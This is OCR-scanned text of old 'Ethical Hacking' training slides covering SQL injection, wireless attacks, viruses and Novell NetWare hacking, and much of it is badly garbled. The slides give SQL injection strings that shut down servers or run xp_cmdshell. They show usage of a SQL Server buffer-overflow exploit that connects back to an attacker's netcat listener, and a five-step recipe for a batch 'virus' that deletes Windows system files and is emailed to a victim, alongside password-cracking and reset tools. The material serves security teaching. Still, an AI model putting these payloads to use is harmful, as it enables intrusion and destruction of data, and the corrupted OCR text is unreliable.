© NTL M , a M i crosoft- propri etary protocol authenti cates users and computers 
based on an authentication challenge and response. 

© Certificated authentication which uses public key cryptography and digital 
certificate to authenticate is stronger than other authentication mechanisms. 

© Forms based Authentication is a system in which unauthenticated requests 
are redi rected to a web form where the unauthenticated users are requi red to 
provi de thei r credenti al s. 

© Attackers make use of different tools to get better of the authentication 
protocols. 

© It istherefore necessaryto evaluate the most secureoption while designing 
web applications to counter cracking activities. 
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Ethical Hacking 



ModuleXIV 
SQL Injection 



Module Objective 



© What is SQL I njection? 

© Exploitingtheweaknessof Server Side 
Scri pti ng 

© Using SQL I njection techniques to gain access 
to a system 

© SQL I njection Scripts 

© Attacl<ing ivi icrosoft SQL Servers 

© IV| SSQL Password Cracl<ers 

© Prevention and Countermeasures 
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I ntroduction - SQL I njection 
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OLE DB Errors 



The user f i 1 1 ed f i el ds are end osed by si ngl e quotati on marks 
('). Soasinnpletestof the form would be to try using (') as 
the username. 

Lets us see what happens if we j ust enter ' i n a form that is 
vulnerableto SQL insertion. 



Microsoft OLE DB Providerfor ODBC Drivers 
error 'S0040e1 4' 

[Microsoft][ODBC Microsoft Access Driver] Extra) 
in query expression 'Userid='3306') or ('a-'a' 
AND Password="'. 

/_bool<ing/login3.asp, line 49 

If you get this error, then we can try 
SQL injection techniques. 
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I nput Validation attacl< 



^EC'Councll I Login - Microsoft Internet €Hplorer 



Fie Edit ViaiN Fovwltos Toots 



Qaack . Q - 






Address http^Z/eccaufK-lor^/La^,^ 




Uf*s » 



EC-Council 

International Council of E-Commerce Consultants 





Education \^HH| 








Log! 




Forgot Password? 


Need Help? 










Member Login 



Example of a Login Page 



Member Login Area 



Please login with your PromotTlc Primje U^sameme and Password 
Username I 



Password [ 




m 



m 



Logrn | 



Forgot Pajgsword 



I nput validation attack occurs here on a website 
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Login Guessing & I nsertion 



© The attacker can try to login without a password. 
Typical user names would be 1=1 or any text within 
single quotes. 

© The most common problem seen on M icrosoft M S-SQL 
boxes is the default <blank>sa password. 

© The attacker can try to guess the username of an 
account by querying for similar user names (ex: 'ad%' is 

used to query for "admin"). 

© The attacker can i nsert data by append i ng commands or 
writing queries. 
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Shutting Down SQL Server 



© One of SQL Server's most powerful commands is 
SHUTDOWN WITH NOWAIT, which causes It to 
shutdown, 1 mmediately stoppi ng the Wi ndows service. 

Username: ' ; shutdown with nowait; -- 
Password [Anything] 

© This can happen if the script runs the following query: 

select userName from users where 
userName='; shutdown with nowait;-' and 
user Pass=' ' 
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Extended Stored Procedures 



© There are several extended stored procedures that can 
cause permanent damage to a system. 

0 We can execute an extended stored procedure usi ng our 
login form with an injected command as the username 
as follows: 

Username: ' ; exec master.. xp_xxx; -- 
Password: [Anything] 

Username: ' ; exec master..xp_cmdshell ' iisreset' ; -- 
Password: [Anything] 
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SQL Server Talks! 



This command uses the 'speech. voicetext' object, causing 
the SQL Server to speak: 

admin* r declare @o int, @ret 

jLnt exec sp^oacreate 

' Speech, voicetext ' , go out 

exec Bp^oanethod @o, 

' register ' , HULL, • f oo ' , 

^bar* exec sp^oasetproperty 

80, * speed ' ,150 exec 

sp^oamethod 60^ ' speak ' , 

NULL, 'all your sequel 

servers are belong to us ' , 

528 waitfbr delay '00:00:05' — 
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Hacking Tool: SQL 



htt p : / / n tsecu r i ty . n u/ cgi - 
bi n/ down I oad/ sql d i ct. exe. pi 



0"SQLdict" is a dictionary 
attack tool for SQL Server. 

©It lets you test if the 
accounts are strong enough to 
resist an attack or not. 
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SQLdict 



SQLdict 2.1 - The SQL Server Dictionary Attacker 

copyright (c) 2000. Arne Vidstrom 
arne.vidstrorin@ntsecurity.nu - httpV/ntsecuritv-nu 



Target server IP: 



Target account: |" 



Load Password File 



Start 



Stop 



Exit 




Hacking Too : SQLExec 



©This tool executes commands on compromised M I crosoft SQL Servers 
usingxp_cmdshell stored procedure. 

©It uses default sa account with NULL password. But this can be modified 
easily. 

USAGE: SQLExecwww.target.com 



C:\WINDOWS\System32\cmd.exB 



C:\DDCurients and Sett ings\Owner\My Docunents\Ethical Hacking Lab Files u2\Module 
14 - SQL In ject ion\sqlexec>sqlexec 

SQLExec 1.0 for Uindows NT/2K/9X 

Bv Egenen Tas <Send all feedbacks and bug reports to egement^btkom . cori> 

Jsage : SQLExec <HDstnarie> 

••••<Do not use ip addresses of targets^**** 

C:\Docurients and Sett ings\Owner\My Docunents\Ethical Hacking Lab Files u2\Module 
14 — SQL In ject ion\sqlexec> 
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Hacking Tool: sqibf 



htt p : / / WWW. cq u re. n et/ tool s. j sp? i d =10 

0 SqIbf is a SQL Sever Password Auditing tool. This tool should 
be used to audit the strength of M icrosoft SQL Server 
passwords off I i ne. The tool can be used either in BruteForce 
mode or i n Dictionary attack mode. The performance on a 
IGHZ Pentium (256MB) machine is around 750,000 
guesses/ sec. 

0 To be able to perform an audit one needs the password hashes 
that are stored i n the sysxiogi ns table i n the master database. 

0 The hashes are easy to retrieve although you need a privileged 
account to do so, I i Ke an sa account. The query to use woul d be: 

select name, password from master .. sysxlogins 

0 To perform a dictionary attack on the retrieved hashes: 

sqlbf -u hashes.txt -d diet ionary . die -r 
out . rep 
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Hacking Tool: SQLSmack 



0 SQLSmack is a Linux based Remote Command 
Execution for MSSQL. 

© The tool allows when provided with a valid username 
and password on a remote M S SQL Server to execute 
commands by pi pi ng them through the stored 

procedure master . . xp_cmdshell 
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Hacking Tool: SQL2.exe 



© SQL2 is a U DP Buffer Overflow Remote Exploit hacking 
tool. 



C:\WINDOWS\System32Vmd.exe 


l-jp] 




C : \Docunen t s and Se 1 1 ingsSOwnerSDeskt opSExplo it s\Explo it s_l\Explo its >sql2 






SQL Seruer UDP Buffer Overflow Remote Exploit 










lodified from "Aduanced Uindows Shellcode" 
Code by Dauid Litchfield, dauid@ngssoftuare.com 
lodified by lion, fix a bug. 

Welcome to HUC Website http://vfuif.cnhonker.com 




■: 


Jsage : 

sql2 Target [<NCHost> <NCPort> <SQLSP>] 






Exemple : 

Target is MSSQL SP 0: 
C:\>nc -1 -p 53 

C:\>sql2 db.target.com 202.202.202.202 53 0 
Target is MSSQL SP 1 or 2: 

c:\>sql2 db.target.com 202.202.202.202 




I 


C : \Documen t s and Se 1 1 ings\Ouner\Deskt opNExplo it s\Explo it s^\Explo it s > 




i 
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Preventive M easures 



© M inimize Privileges of Database Connection 
© Disable verbose error messages 
© Protect the system account 'sa' 
© Audit Source Code 

• Escape Single Quotes 

• Allow only good input 

• Reject known bad input 

• Restrict length of input 



Bl-Council 



Summary 



© SQL I njection is an attack methodology that targets the 
data residing in a database through the firewall that 
shields it. 

© 1 1 attempts to modify the parameters of a Web- based 
applicat on in order to alter the SQL statements that are 
parsed to retrieve data from the database. 

© Database footpri nti ng i s the process of mappi ng out the 
tables on the database and is a crucial toof in the hands 
of an attacker. 

© Exploits occur due to codi ng errors as wel I as 
inadequate validation checks . 

© Preventi on i nvol ves enforci ng better codi ng practi ces 
and database administration procedures. 
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Module XV 

H acki ng W i rel ess N etwor ks 



Module Objective 



© I ntroduction to 802.11 

© WhatisWEP? 

© Finding WLANs 

© Cracl<ingWEP Keys 

© Sniffing Traffic 

© Wireless DoS attacl<s 

© WLAN Scanners 

© WLAN Sniffers 

© Securing Wireless Networks 

© Hacking Tools 
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I ntroduction to Wireless Networking 



© Wireless networking technology is becoming 
i ncreasi ngly popular but at the same ti me has 
introduced many security issues 

© Thepopularity in wireless technology is driven bytwo 
pri mary factors - convenience and cost. 

© A Wireless local area network (WLAN) allows workers 
to access digital resources without being locked into 
thei r desks. 

© Laptops could be carried i nto meeti ngs or even i nto 
Starbucks cafe tapping into the wireless network. This 
convenience has become affordable. 
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Whatis802.Ilx? 



© Wireless LAN standards are defined by the I EEE's 
802.11 worl<ing group. WLANs come in three flavors: 

© 802.11b 

• Operates in the2.4000GHzto 2.2835GHzfrtequency range 
and can operate at up to 11 megabits per second. 

© 802.11a 

• Operates in tine 5. 15- 5. 35G Hz to 5.725-5.825GHz frequency 
range and can operate at up to 54 megabits per second. 

© 802.11g 

• Operates intlie 2.4GHz frequency range (increased bandwidth 
range) and can operate at up to 54 megabits per second. 

Note: WEP standards are defined in the 802. 11 standard 
and not the individual standards. WEP vulnerabilities 
have the potential to affect all flavors of 802.11 
networks. 
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Setting UpWLAN 



0 When setti ng up a WLAN , the channel and service set 
identifier (SSI D) must be configured in addition to 
traditional network settings such as I P address and a 
subnet mask. 

0 The channel is a number between land 11 (land Bin 
Europe) and designates the frequency on which the 
network wi 1 1 operate. 

0 The SSI D is an alphanumeric string that differentiates 
networks operati ng on the same channel . 

0 It is essentially a configurable name that identifies an 
i ndi vidual network. These setti ngs are i mportant factors 
when identifying WLAN sand sniffing traffic. 
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© The SSI D is a unique identifier that wireless networking 
devices use to establish and maintain wireless 
connectivity 

© SSI D acts as a si ngle shared password between access 
points and clients. 

© Security concerns arise when the default values are not 
changed, as these units can beeasilyconnpronnised. 

© A non-secure access mode, al lows cl ients to connect to 
the access point using the configured SSI D, a blank 
SSI D, or an SSI D configured as "any." 



WhatisWEP? 



© WEP is a component of the I EEE 802.U WLAN 
standards. I ts pri nriary purpose i s to provi de for 
confidentiality of data on wireless networks at a level 
equivalenttothat of wired LANs. 

© Wired LANs typically employ physical controls to 
prevent unauthorized users from connecting to the 
network and viewing data. I n a wireless LAN, the 
network can be accessed without physically connecting 
to the LAN . 

©IEEE chose to empi oy encrypti on at the data I i n k I ayer 
to prevent unauthorized eavesdropping on a network. 
This is accomplished by encrypting data with the RC4 
encryption algorithm. 
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MAC Sniffing &AP Spoofing 



© M AC addresses are easi ly sniffed by an attacker si nee 
they must appear in the clear even in when WE P is 
enabled. 

© An attacker can use those "advantages" in order to 
masquerade as a valid MAC address by programming 
the wi reless card, and get i nto the wi reless network and 
use the wi rel ess pi pes. 

© Spoof i ng M AC address i s very easy. U si ng packet- 
capturi ng software, an attacker can determi ne a val id 
MAC address using one packet. 

© To perform a spoofing attack, an attacker must set up 
an access point (rogue) near the target wireless network 
or i n a pi ace where a vi cti m may bel i eve that wi rel ess 
Internet is available. 
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Denial of Service 



© Wireless LANs are 
suscepti bl e to the same 
protocol -based attacks 
that plague wired LAN 

© WLANssend 

information via radio 
waves on public 
frequencies, thus they 
are susceptible to in 
advertent or del i berate 
i nterference from traff i c 
using the same radio 
band. 
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ttacl<s 



Wireless DoS 




wireless Access Point (2.4 MHz) Jamming Slenal (2.4 MHz) 



Hacking Tool: NetStumbler 



http:// WWW. netstumbi er.org 

© NetStumbler is a high level WLAN scanner. It operates 
by sendi ng a steady stream of broadcast packets on al I 
possible channels. 

© Access Poi nts (AP) respond to broadcast packets to 
verify their existence, even if beacons have been 
disabled. 

© NetStumbler displays: 

• Signal Strength 

• MAC Address 

• SSID 

• Channel details 
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H acki ng Tool : Ai roPeek 



http://www.wildpackets.com 

©Airopeek is a 
comprehensive packet 
analyzer for IEEE 802.11 
wireless LANs, supporting all 
higher level network 
protocols such as TCP/ 1 P, 
AppleTalk, NetBUI andlPX. 

©I n addition, AiroPeek 
quickly isolates security 
problems, fully decodes 
802.11a and 802.11b WLAN 
protocols, and analyzes 
wireless network 
performance with accurate 
identification of signal 
strength, channel and data 
rates. 
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IP Wireless Network Connection 6 Channel; 11 
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H acki ng Tool : Ai rsnort 



http:// ai rsnort.shnnoo.com/ 

© AirSnort is a wireless LAN (WLAN) tool which recovers 
encryption keys. AirSnort operates by passively 
mon i tori ng transmi ssi ons, computi ng the encrypti on 
key when enough packets have been gathered. 

0 Ai rSnort requi res approxi mately 5- 10 mi 1 1 i on encrypted 
packets to be gathered. 

© Once enough packets have been gathered, Ai rSnort can 
guess the encrypti on password in under a second. 
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© Kismet is a 802. lib 
wireless network sniffer 
which separates and 
identifies different 
wi re! ess networl<s i n the 
area. 

© Kismet worl<s with any 
wi re! ess card wh i ch i s 
capable of reporti ng raw 
packets. 
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i— Network List — (First Seen)- 
Name 

p@thflnd3r 
KrullNetl 
R-S t a t i s t i cs- 



T U Ch Packts Flags 
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A Y 06 27 



Data Clnt 
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0 0 



Start 
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Networks 
Fetched : 
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8 03:19:28 2002 
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Sav 

Sorting by time first detected 

Found new network "<no ssid>" bssid 00 :02 :2D :0E :7A :B7 WEP Y Ch 7 
Found new network "linksys" bssid 00 :06 :25 :53 :0B :89 WEP N Ch 6 @ 
Batter u: AC charRinR lOOK OhOmOs 



-Info 

Ntwrks 
289 
Pckets 
596 
ptd 
350 
eak 
0 

ise 

802 
crd 
802 
s/s 
50 



psd 
514^ 



@ 11.00 mbi 
11.00 mbit 



0 WEPCrack is an open source tool for breaking 802.11 
WEP secret keys. 

© While Airsnort has captured the media attention, 
WE PCrack was the f i rst publ i cal ly aval I abl e code that 
demonstrated the above attack. 

© The current tools are Perl based and are composed of 
the f ol I owi ng scr i pts: 

WeaklVGen .pi, prism-getIV.pl, WEPCrack .pi 



0 Network discovery tools run on 802. 11 stations and 
passively monitor beacon and probe response frames. 
They typically display discovered devices by SSI D, 
channel, MAC address and location. 

© Vulnerability assessment tools, in addition to network 
d i scovery, sn i ff traff i c to spot secu r i ty pol i cy vi ol ati ons. 

© Traffic monitoring and analysis tools also provide 
discovery and vulnerability alerting. I n addition, they 
capture and exami ne packet content. 

© I DSes may use signature analysis, protocol inspection, 
rules enforcement and/ or anomaly detection. 



Wl DZ, Wireless I ntrusion Detection 
System 



©Wl DZ version 1 is a proof of concept I DS system for 802. 11 that 
guards APs and nnonitors local for potentially nnalevolent activity. 

©It detects scans, association floods, and bogus/ Rogue APs. 1 1 can 
easily be integrated with SNORT or RealSecure. 

/ Target 3 




Ajc:»» point UAsd 

to l^ijAck te£5LQn Hackt^r PC 
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Securing Wireless Networl<s 



© MAC Address Filtering 

This method uses a list of MAC addresses of client 
wi re! ess network i nterface cards that are allowed to 
associ ate with the access poi nt. 

© SSID(NetworklD) 

The f i rst attempt to secure wi reless network was the use 
of Network I D (SSI D). When a wireless client wants to 
associ ate with an access point, the SSI D is transmitted 
during the process. The SSI D is a seven digit 
alphanumeric id that is hard coded into the access point 
and the cl i ent devi ce. 

© Firewalls 

Usi ng a fi rewal I to secure a wi reless network is probably 
theonly security feature that will prevent unauthorizecT 
access. 
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Out of the box security 
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Radius: used as additional layer in the 
security 




Authentication Server 
(RADIUS) 
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Maximum Security: Add VPN to 
Wireless LAN 
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Summary 



© A wireless enables a mobile user to connect to a local area network (LAN) 
through a wireless (radio) connection. 

© Wired Equivalent Privacy (WE P), a security protocol, specified in the IEEE 
Wi-Fi standard, 802.11b, that is designed to provide a wireless local area 
network (WLAN) with a level of security and privacy comparable to what is 
usual ly expected of a wi red LAN . 

© WEP is vulnerable because of relatively short IVsand keys that remain static. 

© Even if WEP isenabled, MAC addresses can be easily sniffed by an attacker as 
they appear i n the clear format. Spoof i ng MAC address is also easy. 

© I f an attacker holds wi reless equi pment nearby a wi reless network, he wi 1 1 be 
ableto perform a spoofing attack by setting up an access point (rogue) near 
the target wi reless network. 

© Wi reless networks are extremely vul nerable to DoS attacks. 

© A var i ety of hacki ng and mon i tori ng tool s are aval I abl e for the Wi rel ess 
networks as well. 

© Securi ng wi reless networks i ncl ude adopti ng a suitable strategy as MAC 
address f i I teri ng, F i re wal I i ng or a combi nati on of protocol based measures. 
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Ethical Hacking 



ModuleXVI 
VIRUSES 



Module Objective 



© Chernobyl 
© ExploreZip 
© I Love You 
© Melissa 
© Pretty Park 
© Code Red Worm 
© W32/Klez 
© BugBear 

© W32/ Opaserv Worm 
© Ant! -Virus Software 
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W32.CI H .Spacefiller (a.k.a Chernobyl) 



© Chernobyl is a deadly virus. Unlike the other viruses 
that have surfaced recently, this one is much more than 
a nuisance. 

© If infected, Chernobyl will erase data on your hard 
drive, and may even keep your machine from booting 
up at all. 

© There are several variants in the wild, each variant 
activates on a different date. Version 12 on April 26th, 
13 on J une 26th, and 14 on the 26th of every month. 
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Wi n32/ Expl ore.Zi p Vi rus 



© ExploreZip is a Win32- based e-mail worm. It searches 
for M icrosoft Office documents on your hard drive and 
nel:worl< drives. 

0 When it finds any Word, Excel, or PowerPoint 
documents using the foil owing extensions: .doc, .xlsand 
. ppt, i t erases the contents of those f i I es. 1 1 al so emai I s 
itself to any one who send you an e-mai I . 

© ExploreZip arrives as an email attachment. The 

message wi 1 1 most I i kely come from someone you know, 
and the body of the message wi 1 1 read: 

"I received your email and I shall send you a reply 
ASAP. Ti 1 1 then, take a look at the attached Zi pped 
docs." The attachment will be named "Zipped_files.exe" 
and havea WinZip icon. Double clicking the program 
i nfects your computer. 
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Love You Virus 



© LoveLetter is a Win32- based e-mail 
worm. 1 1 overwrites certain on your hard 
dri ve(s) and sends itself out to everyone 
in your M icrosoft Outlook address book. 

© LoveLetter arrives as an emai I 
attachment named: LOVE-LETTER- 
FOR-YOU . TXT. VBS though new variants 
have different names including 
VeryF unny.vbs, vi rus_ warni ng.j pg.vbs 
and protect.vbs 



[loveietTe 

iPFDP-YOU.Tj 

1 1 II. 11* II. ••■ iM'ii" 
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What is SQL Insertion Vulnerability? 



©User Controlled Data is placed into an SQL 
query without bei ng val i dated for correct 
format or embedded escape stri ngs. 

© Affects majority of appi i cations which use a 
database backend and don't force variable 
types. 

© At least 50% of the large e-commerce sites and 
about 75% of the medi um to smal I sites are 
vulnerable. 

© Improper validation in CFML, ASPJ SP and 
PH P are the most frequent causes. 
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Melissa Virus 



© M el i ssa i s a M i crosoft Word macro vi r us. 

© Through macros, the vi rus alters the M i crosoft Outlook emai I program 
so that the vi rus gets sent to the f i rst 50 peopi e i n your address book. 

© 1 1 does not corrupt any data on your hard drive or make your 

computer crash. 1 1 j ust changes some Word setti ngs and sends itself to 
the people you don't want to i nfect. 

© Melissa Virus Infection 

• Melissa arrives as an email attachment. 

• The subject of the message contai ni ng the vi rus wi 1 1 read: "I mportant 
message from" followed by the name of the person whose email account it 
was sent from. 

• The body of the message reads: H ere's the document you asked for.. .don't 
show anyone else ;-) Double cl icki ng the attached Word document 
(typically named LIST.DOC) will infect your machine. 
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Pretty Park 



©Pretty Park is a privacy invading worm. 
Every 30 seconds, it tries to e-mai I itself to 
the e-mail addresses in your M icrosoft 
Outlook address book. 

©It has also been reported to connect your 
machine to a custom I RC channel for the 
purpose of retrievi ng passwords from your 
system. 

©Pretty park arrives as an email 
attachment. Double clicking the 
PrettyPark.exe or Files32.exe program 
i nfects your computer. 

©You may see the Pi pes screen after 
runni ng trie executable. 



C:\WINN... HIsll 



File Edit View 

Help f 



Q files32.w<d 





Pretty 
Park.exe 



PrettyParkCi 
leaner.exe 



2 □bject(s) 
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BugBear Virus 



© This worm propagates via shared networl< folders and via emai I . 

© 1 1 a! so ter mi nates anti vi r us programs, act as a bacl<door server 
application, and sends out system passwords - all of which 
compromise security on infected machines. BugBear Infection 

• This worm fakes the FROM field and obtains the recipients for its 
email from email messages, address books and mail boxes on the 

i nfected system. 1 1 generates the f i lename for the attached copy of 
itself from the fol lowi ng: 

• A combination of text strings: setup, card, docs, news, I mage, 
images, pics, resume, photo, video, music or song data; with any of 
the extensions: SCR, PIF,or EXE. An existing system file appended 
with any of the fol I owing extensions: SCR, PIF or EXE. 

• On systems with un patched I nternet Explorer 5.0 and 5.5, the 
worm attachment is executed automatically when messages are 
either opened or previewed using M icrosoft Outlook or Outlook 
Express. 



BI-Gouncil 



Kl 



ElKern, KLAZ, Kletz, l-Worm.klez, 
W95/Klez@mm 

©W32.Klez variants is a mass 
mai I i ng worm that searches the 
Wi ndows address bool< for emai I 
addresses and sends messages to a! I 
the reci pi ents that it f i nds. The 
worm uses its own SMTP engine to 
send the messages. 

©The subject and attachment name 
of the i ncomi ng emai I s are 
randomly chosen. The attachment 
will have one of the extensions: .bat 
.exe, .pif or .scr. 

©The worm exploits a vul nerabi I ity 
in M icrosoft Outlook and Outlook 
Express to try execute itself when 
you open or preview the message. 
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J File E.dil: View S.earch G.o Message X^sks JHelp 

^ & ^ ^ 



Get Msg New Msg Repiv Reply All Forward Fi 





^1 ' Subject 


1 Sen... 


|»|D...^| 


|9-| 








A 


^ 11:28 ... 








J, , ..-iiiiiiiiiiiiiii ....„MyilllBllllM^. 




















Subject: A humour game j 
From: Sender 
Date: 11:32 

To: ssmple3@f-3ecure.com 


II 
1 

i 


This is a very humour game 
This game is my first work. 
You're the first player. 
I wish you would like it. 



E3 O ^ [g^ I I ^^^^^^^^^^m- I Unread: 747 I Total: 7074 |=^?= 



iBi 14:51 


5.3.2002 +0, 


A powful tool 














A powful too J 





From: Sender 
To : S amp 1 e s @D ataFe 1 1 o ws . c om 
Subject: A powful tool 
Date: Tue, 5 Mar 2002 14:51:58 +0100 
X-OriginalArrivalTime : 05 Mar 2002 13:52:27.0049 
FILETIHE=[FC2D9990: 01C1C44C] 

Content-Type: text/html; 

Hello^This is a powful tool 
I expect you would like it. 




hei ghtS .pi f 



Si rCam Worm 



© Si rCam i s a mass mai I i ng e- mai I 
worm with the abi I ity of spreadi ng 
through Windows Networl< shares. 

© Si rCam sends e- mai I s wi th var i abl e 
user names and subject fields, and 
attaches user documents with double 
extensions (such as .doc.pif or 
.xls.Ink) to them. 

©Th w or m col I ects a I i st of f i I es wi th 
certain extensions ('.DOC, '.XLS', 
'.ZIP') into fake DLL files named 
'sc*.dir. Thw orm then sends itself 
out with one of the document files it 
found in a users' "My Documents" 
folder. 



'si tnbox,- Mic(otDl) OutloDfc' 



Fie |dit Favorites loofe Acbore Help 



Inbox 



is 



• M S Bart Simp.r. . Sopimu^ 



^ OutM Tod^ >^ Q Bdrt Simp.. Sopimus 

0 Calendar 
0 Cortacts 
■@ Oetetedltem| 

r- ^ liiuA [2] From: B^rt Sin^Eon 



pe n.e„, 



I Jgunal 



Notes 
Sen* Items 
E ^ Public Folders 



Subject: Sgpimus 



To: jflfied@testfiet.loG 



Hi ! Ho¥ are you? 



I send you this file in order to 



See lAter. Thanks 



J M\ 



'2 dosm., 2 Unread 
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N i mda Vi rus 



©Nimda is a complex virus with a 
mass mai I i ng worm component 
which spreads itself in attachments 
namedREADME.EXE. 

©It affects Windows 95, 98, ME, 
NT4 and Windows 2000 users. 

©Nimda is the first worm to modify 
exi sti ng web sites to strt offeri ng 
infected files for download. It is also 
the first worm to use normal end 
user machi nes to scan for 
vulnerable web sites. 

© N i mda uses the U n i code expl oi t to 
i nf ect 1 1 S Web servers. 
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Code Red Worm 



© The "Code Red" worm attempts to connect to TCP port 
80 on a randomly chosen host assuming that a web 
server will be found. 

© Upon a successful connection to port 80, the attacking 
host sends a crafted HTTP GET request to the victi m, 
attempti ng to exploit a buffer overflow i n the Wi ndows 
2000 I ndexing Service. 

© If the exploit is successful, the worm begi ns executi ng 
on the VI cti m host. I n the ear I i er var i ant of the worm, 
victim hosts with a default language of English 
experi enced the fol I owi ng defacement on al I pages 
requested from the server: 

HELLO ! welcome to http : / /www . worm . com ! 
Hacked By Chinese! 
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Wri ti ng your own si mpl e vi rus 



© Step 1 Create a batch f i I e Game. bat with the fol I owi ng 
text @ echo off 

0 deletec:\winnt\system32\* * 

© deletec:\winnt\* * 

© Step 2: Convert the Game. bat batch f i le to Game.com 
using bat2com utility. 

© Step 3: Assign I con to Game.com usi ng Wi ndows fi le 
properties screen. 

© Step 4: Send the Game.com fi le as an e-mai I attachment 
to a victim. 

© Step 5: When the victim runs this program, it deletes 
core f i I es i n WI N NT di rectory maki ng Wi ndows 
unusable. 
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Hacking Tool: Se 
Worm Generator 



(http://sennaspy.cjb.net) 



This tool can generate a 
VBS wornn. 



An Executable 
can be 1 nserted 
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Spy I nternet 



Senna Spy Internet Worm Gi^nerdtor 2000 ^ 2,0 



Senna Spy Internet Worm Generator 2000 - 2.0 



Worm ramti | 
Subiec^ 



A.I 



r OuUook set spread? 



r Aign oofk 1 

r Regisljy auto-start ? 




Anti -Virus Software 



© The only prevention against 
vi rus i s to i nstal I anti - vi rus 
software and keep the updates 
current. 

© Promi nent anti-vi rus software 
vendors include: 

1 McAfee 

2. Norton Antivirus 

3. Antiviral Toolkit Pro 

4. Dr. Solomon's 

5. Trend Micro 

6. Command Antivirus 

7. Data Fellows 



Symantec™ 



search : site index. 



global sites.. 




products & services purchase support security response downloads about! 



Svma 



ymantec S 



Security Response USA ' 



Symantec Security Alert! 

W32.SQLExp.Worm is a Category 3 
worm that targets servers running 
Microsoft SQL, The worm sends 376 
bytes to 1434/udp (the SQL Server 
Resolution Service Port), 

Symantec Security Response 
recommends configuring perimeter 
devices to block 1434/udp traffic from 
untrusted hosts. 



i 



Announcements 



> Entefpiise Solutions 

> Public Sector 

> Small Business 

> Home ComputinE 



> Partners ! 



Enterprise Solutions >.]( 



Symantec Enterprise Security Forum 

Join industry ewperts Forrester and Symantec 
for a Security Forum, Learn about trends and 
solutions in network security, more info 

Taxtime Solutions 

Secure your computer, yourtawes, and your 
savings with a special tawtime offer on Norton 
Antivirus and Norton Personal Firewall, more 
info 



Symantec Incid* 

Real-time security 
management for ei 
environments moi 

i 



Shop Home Computinj 



Norton AntiVimi 

The world's mostt 
solution, more inl 



Virus Encyclopedia resources at Symantec 
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Summary 



© Vi ruses come i n different forms. 

© Some are mere nuisances some come with devastati ng 
consequences. 

© E-mail wormsareself replicating and clogs the 
networks with unwanted traffic. 

© Vi rus codes are not necessari ly complex. 

© 1 1 is necessary to scan the systems/ networks for 
infections on a periodic basis for protection against 
vi ruses. 

© Anti-dotes to new vi rus releases are promptly made 
aval I able by security companies and this forms the 
major counter measure. 
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Ethical Hacking 



Module XVI I 
Novell Hacking 



Module Objective 



© Common Accounts and passwords 

© Accessing password files 

© Password crackers 

© Netware hacking tools 

- Chknull 

- NOVELBFH 

- NWPCRACK 

- Bindery 

- BInCrack 

- SETPWD.NLM 

- Kock 

- userdump 

- Burglar 

- Getit 

- Spoof! og 

- Gobbler 

- Novelffs 

- Pandora 
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N ovel I N etware Basi cs 



© Object Model 

0 Access Control Lists 

© Rights 

© Levels of Access 
© Packet Signature 
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Default Accounts and Setti ngs 



©Server Settings 
©Supervisor Account 
©Default Rights 
©RCONSOLE security concerns 
©Server Connnnands and Settings 



MQNITaH.NiJvl 



y4± 



nbtilv.iJBt 



MQNITDRNIJJ 
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Valid Account names on Novell 
N etware 



© Any I i mi ted account should have enough access to al low 
you to run SYSCON, located in SYS:PUBLIC directory. 

0 I f you get i n, type SYSCON and enter. Now go to User 
I nformation and you will see all defined accounts. 

© You will not get much info with a limited account, but 
you can get the account and the user's f ul I name. 

© I f you are I N with any val id account, you can run 
USETLST.EXE and get a list of all valid account names 
on the server. 
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Hacking Tool: Chknull.exe 



CH KN U LL shows you every account with no password 
and you do not have to be logged in. For this to work 
bindery emulation must be on. 







-5 n 








mm 


rit-UUi;! HAS A HULL UdLv-jLiuiii 
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Access the password f i I e i n N ovel I 
N etware 



0 Access to the password f i I e i n the N etware i s not I i ke 
Unix- the password f i I e i s not i n the open . Al I obj ects 
and thei r properties are l<ept i n the bi ndery fi les on the 
3.x, and l<ept i n the N DS database i n the 4.x. 

© The bindery file attributes (or Flags) in 3.x are hidden 
and System, and these files are located on the SYS: 
vol ume i n the SYSTE M subdi rectory. 

© 3.x- NET$OBJ .SYS, NET$PROP.SYS, NET$VAL.SYS 

© TheNET$BVAL.SYSand NET$VAL. SYS are where the 
passwords are actual I y located i n 3.x and 4.x 
respectively. 
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Access the password f i I e i n N ovel 
Netware (contd..) 



0ln Netware 4.x. thefiles are physically located in 
different location than on SYSivolume. 

©By using the RCON SOLE utility and using the Scan 
Directory option, you can see the files in 
SYS:_ NETWARE: 

©There is another way to view these fi les and potential I y 
edit them. After installing NW4 on a NW3 volume, reboot 
the server with 3.x SERVER.EXE 

©On a volume SYS will be on the_ NETWARE directory. 
SYS:_NETWARE ishidden better on 4.1that4.0x. Butin 
4.1you can still see the files by scanning the directory 
entry numbers using NCP calls (you need the API s for 
this) using the function 0x17 sub function OxFB. 
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Tool: NOVELBFH.EXE & 
NWPCRACK.EXE 



WCRACK U,5 beta - Netware Password Cracker - Uritten by Teiwaz & Gray 
Send any Connents or bug reports to teiwazPwolfenet .con 
Jsage is: NUPCRACK User_Nane Dictionary_File_Nane /Location 
ie.. NUPCRflCK SUPERUISOR C:\HACK\BIGDICT, TXT 

WCRACK will work against the current preferred server setting 
that is stored in the net.cfg file 



'n'x 




© Novel bfh is brute force password cracker which works 
on Netware 3.x versions. 

0 N WPCRACK is a password cracker that works agai nst a 
single account and uses a dictionary word list. 
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Hacking Tool: Bi ndery.exe & 
BinCrack.exe 



© Bi ndery.exe i s a password cracker that works di rectly 
against the .OLD bindery files. 

0 This tool extracts user information out of bindery files 
i nto a U n i X- styl e password text f i I e. 

© Then you can use BI NCRACK.EXE to "crack" the 
extracted text f i I e. 



Bl-Council 



Hacking Tool: SETPWD.NLM 



I f you have access to the 
console, either by 
standi ng i n front of it or 
byRCONSOLE,you can 
useSETSPASS.NLM, 
SETSPWD.NLM or 
SETPWD.NLM to reset 
passwords. 

J ust load the NLM and 
pass it command line 
parameters: 



NLH Account (s) reset Netware version (s) supported 



3ET3PA33.NLH 3UPERVI30R 3.3( 
3ET3PUD.WLH 3UPERVI30R 3.x, 4.x 

3ETPUD . WLH any val id account 3.x, 4.x 



How to Use SETPWD.NLM 

You can load SETPWD at the console or via RCOHSOLE. 
I£ you use RCONSOLE, use 

the Transfer Files To Server option and put the file 

in SYS: SYSTEM, 

Etar 3 . x: 

LOAD [path if not in SYS: SYSTEM] SETPWD [username] 
[ newpassword] 

Ebr 4 . 3c: 

set bindery context = [context^ e.g. hack. corp. us] 
LOAD [path if not in SYS: SYSTEM] SETPWD [username] 
I newpassvord] 
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other Tool s 



0 H acki ng Tool : Kock 

For Netware 3.11 exploits bug in a Netware attached to log in 
without a password. 

© H acki ng Tool : userdump 

